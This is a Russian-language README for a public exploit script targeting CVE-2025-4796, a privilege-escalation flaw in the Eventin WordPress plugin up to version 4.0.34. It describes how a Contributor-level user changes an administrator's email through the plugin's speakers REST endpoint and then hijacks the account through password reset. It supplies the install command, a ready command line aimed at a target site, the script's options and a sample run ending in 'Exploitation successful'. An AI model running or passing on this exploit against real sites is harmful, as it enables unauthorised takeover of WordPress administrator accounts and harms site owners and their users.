
Eventin <= 4.0.34 — повышение привилегий аутентифицированных пользователей (Contributor+) через смену email пользователя/захват аккаунта
Eventin <= 4.0.34 - Повышение привилегий для аутентифицированных пользователей (Contributor+) через смену email пользователя / захват учётной записи
В этом репозитории документируется уязвимость повышения привилегий в плагине Eventin для WordPress (<= 4.0.34), которая позволяет аутентифицированному пользователю с правами Contributor+ изменять адреса электронной почты произвольных пользователей через API обновления спикеров плагина. Изменив email администратора, злоумышленник может инициировать сброс пароля и получить полный контроль над учётной записью.
Уязвимый компонент: плагин Eventin для WordPress (Eventin\Speaker\Api\SpeakerController::update_item)
Затронутые версии: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (Высокий)
Активных установок: 10,000+
Eventin не выполняет надлежащую проверку личности или прав вызывающей стороны перед обновлением данных спикера/пользователя (в частности, email). Злоумышленник, аутентифицированный как contributor (или выше), может изменить адрес электронной почты других пользователей — включая администраторов — с помощью REST-эндпоинта плагина:
После изменения email на адрес, контролируемый злоумышленником, стандартный механизм сброса пароля WordPress может быть использован для захвата учётной записи.
Имя файла: CVE-2025-4796.py
Этот скрипт автоматизирует следующие шаги:
/wp-json/eventin/v2/speakers/<speaker_id> для обновления email спикера.Требования:
Установка:
pip install requests
Запустите скрипт из командной строки:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
Показать справку скрипта:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
Автор: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/